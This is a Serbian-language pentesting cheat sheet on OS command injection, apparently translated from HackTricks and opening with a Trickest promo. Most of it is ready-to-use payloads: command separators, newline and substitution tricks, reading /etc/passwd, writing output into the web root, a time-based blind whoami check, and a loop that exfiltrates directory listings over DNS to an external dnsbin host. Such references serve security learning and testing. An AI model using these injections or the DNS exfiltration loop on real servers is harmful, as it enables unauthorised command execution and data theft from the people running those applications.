Koristite Trickest da lako izgradite i automatizujete radne tokove pokretane najnaprednijim alatima zajednice na svetu.
Dobijte pristup danas:
Šta je komandna injekcija?
Komandna injekcija omogućava izvršavanje proizvoljnih operativnih sistema komandi od strane napadača na serveru koji hostuje aplikaciju. Kao rezultat, aplikacija i svi njeni podaci mogu biti potpuno kompromitovani. Izvršavanje ovih komandi obično omogućava napadaču da stekne neovlašćen pristup ili kontrolu nad okruženjem aplikacije i osnovnim sistemom.
Kontekst
Zavisno o gde se vaš unos ubacuje možda ćete morati da završite citirani kontekst (koristeći " ili ') pre komandi.
Komandna Injekcija/Izvršenje
#Both Unix and Windows supportedls||id; ls||id; ls||id; ls||id# Execute bothls|id; ls|id; ls|id; ls|id# Execute both (using a pipe)ls&&id; ls&&id; ls&&id; ls&&id# Execute 2º if 1º finish okls&id; ls&id; ls&id; ls&id# Execute both but you can only see the output of the 2ºls%0Aid# %0A Execute both (RECOMMENDED)#Only unix supported`ls`# ``$(ls)# $()ls; id# ; Chain commandsls${LS_COLORS:10:1}${IFS}id# Might be useful#Not executed but may be interesting> /var/www/html/out.txt #Try to redirect the output to a file< /etc/passwd #Try to send some input to the command
Bypass-ovi ograničenja
Ako pokušavate da izvršite proizvoljne komande unutar Linux mašine biće vam interesantno pročitati o ovim Bypass-ovima:
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
DNS bazirano iznošenje podataka
Zasnovano na alatu sa https://github.com/HoLyVieR/dnsbin takođe hostovanom na dnsbin.zhack.ca
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done